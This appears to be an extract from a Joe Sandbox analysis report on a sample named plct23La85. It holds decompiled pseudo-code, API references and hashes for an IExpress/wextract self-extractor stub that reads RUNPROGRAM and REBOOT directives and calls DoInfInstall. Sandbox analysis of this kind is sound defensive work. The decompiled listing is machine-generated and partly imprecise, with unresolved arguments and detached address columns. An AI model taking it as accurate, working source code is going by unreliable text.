                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                    • API String ID: 1065093856-3290032183
                                                                                                                                                                                                    • Opcode ID: 5655f44eaddec79c1eff19e726d47f2be94785cdef58e2691cccf93409512605
                                                                                                                                                                                                    • Instruction ID: 7a4f4c0784385cc28b7325ead8a1800912059719081180a9608984dc8c73988d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5655f44eaddec79c1eff19e726d47f2be94785cdef58e2691cccf93409512605
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F421D2B1A00218ABDB10DF25DC85FEB776CEB54324F0041A9F585A3280DBB05DC58FA4
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E001347E0(intOrPtr* __ecx) {
                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                    				intOrPtr* _t22;
                                                                                                                                                                                                    				void _t24;
                                                                                                                                                                                                    				struct HWND__* _t25;
                                                                                                                                                                                                    				struct HWND__* _t26;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                    				intOrPtr* _t33;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t33 = __ecx;
                                                                                                                                                                                                    				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                    				if(_t34 != 0) {
                                                                                                                                                                                                    					_t22 = _t33;
                                                                                                                                                                                                    					_t27 = _t22 + 1;
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t6 =  *_t22;
                                                                                                                                                                                                    						_t22 = _t22 + 1;
                                                                                                                                                                                                    					} while (_t6 != 0);
                                                                                                                                                                                                    					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                    					 *_t34 = _t24;
                                                                                                                                                                                                    					if(_t24 != 0) {
                                                                                                                                                                                                    						_t28 = _t33;
                                                                                                                                                                                                    						_t19 = _t28 + 1;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t9 =  *_t28;
                                                                                                                                                                                                    							_t28 = _t28 + 1;
                                                                                                                                                                                                    						} while (_t9 != 0);
                                                                                                                                                                                                    						E00131680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                    						_t11 =  *0x1391e0; // 0x3078e20
                                                                                                                                                                                                    						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                    						 *0x1391e0 = _t34;
                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t25 =  *0x138584; // 0x0
                                                                                                                                                                                                    					E001344B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                    					LocalFree(_t34);
                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t26 =  *0x138584; // 0x0
                                                                                                                                                                                                    				E001344B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                    				goto L2;
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00134E6F), ref: 001347EA
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00134823
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00134847
                                                                                                                                                                                                      • Part of subcall function 001344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
                                                                                                                                                                                                      • Part of subcall function 001344B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00134851
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                    • API String ID: 359063898-3290032183
                                                                                                                                                                                                    • Opcode ID: 265935efbee25d967d04e6638a4269e48c407ab2bafd4f1c1f73a4b30aa7fa1d
• Instruction ID: 5f492cbdb850fb9b5527773c2c65aa7fec4b9c06923af6338d983fd7adc38052
• Opcode Fuzzy Hash: 265935efbee25d967d04e6638a4269e48c407ab2bafd4f1c1f73a4b30aa7fa1d
• Instruction Fuzzy Hash: BD1121B9604741AFE7288F64AC18F723B5AEB85310F0485A9FA829B741DB35EC068660
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%
E00136517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
	struct HRSRC__* _t6;
	void* _t21;
	struct HINSTANCE__* _t23;
	int _t24;

	_t23 =  *0x139a3c; // 0x130000
	_t6 = FindResourceA(_t23, __edx, 5);
	if(_t6 == 0) {
		L6:
		E001344B9(0, 0x4fb, 0, 0, 0x10, 0);
		_t24 = _a16;
	} else {
		_t21 = LoadResource(_t23, _t6);
		if(_t21 == 0) {
			goto L6;
		} else {
			if(_a12 != 0) {
				_push(_a12);
			} else {
				_push(0);
			}
			_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
			FreeResource(_t21);
			if(_t24 == 0xffffffff) {
				goto L6;
			}
		}
	}
	return _t24;
}


APIs
• FindResourceA.KERNEL32(00130000,000007D6,00000005), ref: 0013652A
• LoadResource.KERNEL32(00130000,00000000,?,?,00132EE8,00000000,001319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00136538
• DialogBoxIndirectParamA.USER32(00130000,00000000,00000547,001319E0,00000000), ref: 00136557
• FreeResource.KERNEL32(00000000,?,?,00132EE8,00000000,001319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00136560
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: Resource$DialogFindFreeIndirectLoadParam
• String ID:
• API String ID: 1214682469-0
• Opcode ID: a19ce6203e6d314657e5dbb3984fe1c57e3f8083adaf69ef6ba52f8da243a23a
• Instruction ID: dd32ff8855ad578b20d1b3422853ba0d11cbd05fdcaa3d5bb9f0ef07dfd35760
• Opcode Fuzzy Hash: a19ce6203e6d314657e5dbb3984fe1c57e3f8083adaf69ef6ba52f8da243a23a
• Instruction Fuzzy Hash: C5014472200609BBCB105FA9AC48DBB7A6CEF893B0F004139FE50E3190D7B1CC50CAA1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00133680(void* __ecx) {
	void* _v8;
	struct tagMSG _v36;
	int _t8;
	struct HWND__* _t16;

	_v8 = __ecx;
	_t16 = 0;
	while(1) {
		_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
		if(_t8 == 0) {
			break;
		}
		if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
			continue;
		} else {
			do {
				if(_v36.message != 0x12) {
					DispatchMessageA( &_v36);
				} else {
					_t16 = 1;
				}
				_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
			} while (_t8 != 0);
			if(_t16 == 0) {
				continue;
			}
		}
		break;
	}
	return _t8;
}


APIs
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0013369F
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001336B2
• DispatchMessageA.USER32(?), ref: 001336CB
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001336DA
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: Message$Peek$DispatchMultipleObjectsWait
• String ID:
• API String ID: 2776232527-0
• Opcode ID: 316b7b4e330b036e7dea65af11303a2dcf08472a8c326c8ab2a1bedd0e19ca07
                                                                                                                                                                                                    • Instruction ID: 2095d83bc040aa944958f215cf8cde8a4011bb28d729287993963d5c7dc655fa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 316b7b4e330b036e7dea65af11303a2dcf08472a8c326c8ab2a1bedd0e19ca07
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 650167B29002557BDF304BA65C4DEEB767CEBC5B11F140219F915E2180D761C784C6B5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 72%
E001365E8(char* __ecx) {
    char _t3;
    char _t10;
    char* _t12;
    char* _t14;
    char* _t15;
    CHAR* _t16;

    _t12 = __ecx;
    _t15 = __ecx;
    _t14 =  &(__ecx[1]);
    _t10 = 0;
    do {
        _t3 =  *_t12;
        _t12 =  &(_t12[1]);
    } while (_t3 != 0);
    _push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
    while(1) {
        _t16 = CharPrevA(_t15, ??);
        if(_t16 <= _t15) {
            break;
        }
        if( *_t16 == 0x5c) {
            L7:
            if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                _t16 = CharNextA(_t16);
            }
             *_t16 = _t10;
            _t10 = 1;
        } else {
            _push(_t16);
            continue;
        }
        L11:
        return _t10;
    }
    if( *_t16 == 0x5c) {
        goto L7;
    }
    goto L11;
}
Instruction addresses for the C-code statement lines above, in order: 0x001365e8, 0x001365ed, 0x001365ef, 0x001365f2, 0x001365f4, 0x001365f4, 0x001365f6, 0x001365f7, 0x00136608, 0x00136611, 0x00136618, 0x0013661c, 0x00000000, 0x00000000, 0x0013660e, 0x00136623, 0x00136625, 0x0013663b, 0x0013663b, 0x0013663d, 0x00136641, 0x00136610, 0x00136610, 0x00000000, 0x00136610, 0x00136644, 0x00136647, 0x00136647, 0x00136621, 0x00000000, 0x00000000, 0x00000000

APIs
• CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00132B33), ref: 00136602
• CharPrevA.USER32(?,00000000), ref: 00136612
• CharPrevA.USER32(?,00000000), ref: 00136629
• CharNextA.USER32(00000000), ref: 00136635
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: Char$Prev$Next
• String ID:
• API String ID: 3260447230-0
• Opcode ID: 5e88de13cdd5b49c5ac6743dfbdea42c09a9fd6bf0a19e3abeef3c98a000b82a
• Instruction ID: 9cc3f64cbfedae9415dca7986afee690df2ca3690efde26cb91dce03f63e6f5e
• Opcode Fuzzy Hash: 5e88de13cdd5b49c5ac6743dfbdea42c09a9fd6bf0a19e3abeef3c98a000b82a
• Instruction Fuzzy Hash: A2F028B20041507EE7321B288C88CBBBF9CCF97395F2941AFE5D692411D7150D468671
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E001369B0() {
    intOrPtr* _t4;
    intOrPtr* _t5;
    void* _t6;
    intOrPtr _t11;
    intOrPtr _t12;

     *0x1381f8 = E00136C70();
    __set_app_type(E00136FBE(2));
     *0x1388a4 =  *0x1388a4 | 0xffffffff;
     *0x1388a8 =  *0x1388a8 | 0xffffffff;
    _t4 = __p__fmode();
    _t11 =  *0x138528; // 0x0
     *_t4 = _t11;
    _t5 = __p__commode();
    _t12 =  *0x13851c; // 0x0
     *_t5 = _t12;
    _t6 = E00137000();
    if( *0x138000 == 0) {
        __setusermatherr(E00137000);
    }
    E001371EF(_t6);
    return 0;
}
Instruction addresses for the C-code statement lines above, in order: 0x001369b7, 0x001369c2, 0x001369c8, 0x001369cf, 0x001369d8, 0x001369de, 0x001369e4, 0x001369e6, 0x001369ec, 0x001369f2, 0x001369f4, 0x00136a00, 0x00136a07, 0x00136a0d, 0x00136a0e, 0x00136a15

APIs
• Part of subcall function 00136FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00136FC5
• __set_app_type.MSVCRT ref: 001369C2
• __p__fmode.MSVCRT ref: 001369D8
• __p__commode.MSVCRT ref: 001369E6
• __setusermatherr.MSVCRT ref: 00136A07
Memory Dump Source
• Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
Similarity
• API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
• String ID:
• API String ID: 1632413811-0
• Opcode ID: cb46b1dea20fb0c289071b18920927e7773b99db6431f42997566d5caec04ddf
• Instruction ID: db476d18013a1b0a98eec0c557ac32beae4298a3d36391072ea2f64b22aa85e8
• Opcode Fuzzy Hash: cb46b1dea20fb0c289071b18920927e7773b99db6431f42997566d5caec04ddf
• Instruction Fuzzy Hash: E7F015B0108301DFD729AB30EE0A6097BA1FB25331F504A09F4A286AF1CF7A85C5CB11
Uniqueness

Uniqueness Score: -1.00%

Callgraph

• Executed
• Not Executed
• Opacity -> Relevance
• Disassembly available
[Callgraph image: program-wide call graph of the Function_00FD* routines in the 0x00FD0000 module; rendered graph not available in this extraction]

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph image for function fd3ba2 (entry block fd3ba2-fd3bd9, exit via fd3f4d/fd3f4f call fd6ce0); blocks call memset, CompareStringA, GetProcAddress, LocalFree and FreeLibrary, plus subcalls fd468f, fd44b9, fd1781, fd1ae8, fd2267, fd3fef, fd202a, fd6495 and fd6285; rendered graph not available in this extraction]
C-Code - Quality: 82%
			E00FD3BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0xfd8004; // 0x42de454f
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0xfd9124 =  *0xfd9124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0xfd8a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0xfd8c42 != 0) {
							goto L26;
						}
                                                                                                                                                                                                    						_t146 =  &_v396;
                                                                                                                                                                                                    						_t115 = E00FD468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                    						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                    							L25:
                                                                                                                                                                                                    							_t146 = 0x4b1;
                                                                                                                                                                                                    							E00FD44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    							 *0xfd9124 = 0x80070714;
                                                                                                                                                                                                    							goto L62;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							if(_v396 != 1) {
                                                                                                                                                                                                    								__eflags = _v396 - 2;
                                                                                                                                                                                                    								if(_v396 != 2) {
                                                                                                                                                                                                    									_t137 = 3;
                                                                                                                                                                                                    									__eflags = _v396 - _t137;
                                                                                                                                                                                                    									if(_v396 == _t137) {
                                                                                                                                                                                                    										_v304 = 1;
                                                                                                                                                                                                    										_v300 = _t137;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L14;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_push(6);
                                                                                                                                                                                                    								_v304 = 1;
                                                                                                                                                                                                    								_pop(0);
                                                                                                                                                                                                    								goto L11;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_v304 = 1;
                                                                                                                                                                                                    								L11:
                                                                                                                                                                                                    								_v300 = 0;
                                                                                                                                                                                                    								L14:
                                                                                                                                                                                                    								if(_t127 != 0) {
                                                                                                                                                                                                    									L27:
                                                                                                                                                                                                    									_t155 = 1;
                                                                                                                                                                                                    									__eflags = _t127 - 1;
                                                                                                                                                                                                    									if(_t127 != 1) {
                                                                                                                                                                                                    										L31:
                                                                                                                                                                                                    										_t132 =  &_v280;
                                                                                                                                                                                                    										_t76 = E00FD1AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                    										__eflags = _t76;
                                                                                                                                                                                                    										if(_t76 == 0) {
                                                                                                                                                                                                    											L62:
                                                                                                                                                                                                    											_t77 = 0;
                                                                                                                                                                                                    											L63:
                                                                                                                                                                                                    											_pop(_t150);
                                                                                                                                                                                                    											_pop(_t156);
                                                                                                                                                                                                    											_pop(_t128);
                                                                                                                                                                                                    											return E00FD6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t157 = _v404;
                                                                                                                                                                                                    										__eflags = _t149;
                                                                                                                                                                                                    										if(_t149 != 0) {
                                                                                                                                                                                                    											L37:
                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                    												L57:
                                                                                                                                                                                                    												_t151 = _v408;
                                                                                                                                                                                                    												_t146 =  &_v352;
                                                                                                                                                                                                    												_t130 = _t151; // executed
                                                                                                                                                                                                    												_t79 = E00FD3FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                    												__eflags = _t79;
                                                                                                                                                                                                    												if(_t79 == 0) {
                                                                                                                                                                                                    													L61:
                                                                                                                                                                                                    													LocalFree(_t151);
                                                                                                                                                                                                    													goto L62;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												L58:
                                                                                                                                                                                                    												LocalFree(_t151);
                                                                                                                                                                                                    												_t127 = _t127 + 1;
                                                                                                                                                                                                    												_v396 = _t127;
                                                                                                                                                                                                    												__eflags = _t127 - 2;
                                                                                                                                                                                                    												if(_t127 >= 2) {
                                                                                                                                                                                                    													_t155 = 1;
                                                                                                                                                                                                    													__eflags = 1;
                                                                                                                                                                                                    													L69:
                                                                                                                                                                                                    													__eflags =  *0xfd8580;
                                                                                                                                                                                                    													if( *0xfd8580 != 0) {
                                                                                                                                                                                                    														E00FD2267();
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													_t77 = _t155;
                                                                                                                                                                                                    													goto L63;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t153 = _v392;
                                                                                                                                                                                                    												_t149 = _v388;
                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											L38:
                                                                                                                                                                                                    											__eflags =  *0xfd8180;
                                                                                                                                                                                                    											if( *0xfd8180 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c7;
                                                                                                                                                                                                    												E00FD44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                    												LocalFree(_v424);
                                                                                                                                                                                                    												 *0xfd9124 = 0x8007042b;
                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *0xfd9a34 & 0x00000004;
                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t129 = E00FD6495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                    											__eflags = _t129;
                                                                                                                                                                                                    											if(_t129 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c8;
                                                                                                                                                                                                    												E00FD44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                    												L65:
                                                                                                                                                                                                    												LocalFree(_v408);
                                                                                                                                                                                                    												 *0xfd9124 = E00FD6285();
                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                    											_v404 = _t146;
                                                                                                                                                                                                    											__eflags = _t146;
                                                                                                                                                                                                    											if(_t146 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c9;
                                                                                                                                                                                                    												__eflags = 0;
                                                                                                                                                                                                    												E00FD44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                    												FreeLibrary(_t129);
                                                                                                                                                                                                    												goto L65;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *0xfd8a30;
                                                                                                                                                                                                    											_t151 = _v408;
                                                                                                                                                                                                    											_v384 = 0;
                                                                                                                                                                                                    											_v368 =  &_v280;
											_t96 =  *0xfd9a40; // 0x3
											_v364 = _t96;
											_t97 =  *0xfd8a38 & 0x0000ffff;
											_v380 = 0xfd9154;
											_v376 = _t151;
											_v372 = 0xfd91e4;
											_v360 = _t97;
											if( *0xfd8a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0xfd9a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0xfd8d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0xfd9a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0xfd0288( &_v384);
											_t101 = _v404(); // indirect call through a function pointer held on the stack
											__eflags = _t164 - _t164; // decompiler folded both sides of a stack-pointer balance check (cmp after the indirect call) into _t164
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29"); // __fastfail(4 = FAST_FAIL_INCORRECT_STACK)
											}
											 *0xfd9124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0xfd9a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0xfd8a20;
										if( *0xfd8a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E00FD202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									// POSTRUNPROGRAM, RUNPROGRAM, ADMQCMD, USRQCMD and REBOOT are the directive names of an IExpress/wextract self-extractor;
									// from its call sites E00FD468F appears to copy the named resource into the buffer (inferred, not stated by the report)
									_t108 = E00FD468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0xfd8c42;
									if( *0xfd8c42 != 0) {
										goto L69;
									}
									// case-insensitive compare (LOCALE_INVARIANT, NORM_IGNORECASE) against the "<None>" placeholder IExpress stores for an unset directive
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0xfd8a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E00FD468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E00FD468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									// decompiler arithmetic: "result - 2 != 0xfffffffe" is simply "result != 0"
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00FD1781( &_v276, 0x104, _t130, 0xfd8c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E00FD468F(_t130, 0xfd9a2c, 4); // REBOOT value is read into a 4-byte slot; longer or missing values are treated as an error
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

Address column detached from the listing above by extraction (per-line pairing lost): 0x00fd3baa 0x00fd3bb0 0x00fd3bb7 0x00fd3bc0 0x00fd3bc2 0x00fd3bc9 0x00fd3bcb 0x00fd3bcf 0x00fd3bd3 0x00fd3bd9 0x00fd3bfd 0x00fd3bfd 0x00fd3bff 0x00fd3c03 0x00fd3c03 0x00fd3c11 0x00fd3c16 0x00fd3c19 0x00fd3c28 0x00000000 0x00000000 0x00fd3c30 0x00fd3c39
                                                                                                                                                                                                    0x00fd3c40
                                                                                                                                                                                                    0x00fd3d13
                                                                                                                                                                                                    0x00fd3d15
                                                                                                                                                                                                    0x00fd3d21
                                                                                                                                                                                                    0x00fd3d26
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3c4f
                                                                                                                                                                                                    0x00fd3c56
                                                                                                                                                                                                    0x00fd3c60
                                                                                                                                                                                                    0x00fd3c65
                                                                                                                                                                                                    0x00fd3c77
                                                                                                                                                                                                    0x00fd3c78
                                                                                                                                                                                                    0x00fd3c7c
                                                                                                                                                                                                    0x00fd3c7e
                                                                                                                                                                                                    0x00fd3c82
                                                                                                                                                                                                    0x00fd3c82
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3c7c
                                                                                                                                                                                                    0x00fd3c67
                                                                                                                                                                                                    0x00fd3c69
                                                                                                                                                                                                    0x00fd3c6d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3c58
                                                                                                                                                                                                    0x00fd3c58
                                                                                                                                                                                                    0x00fd3c6e
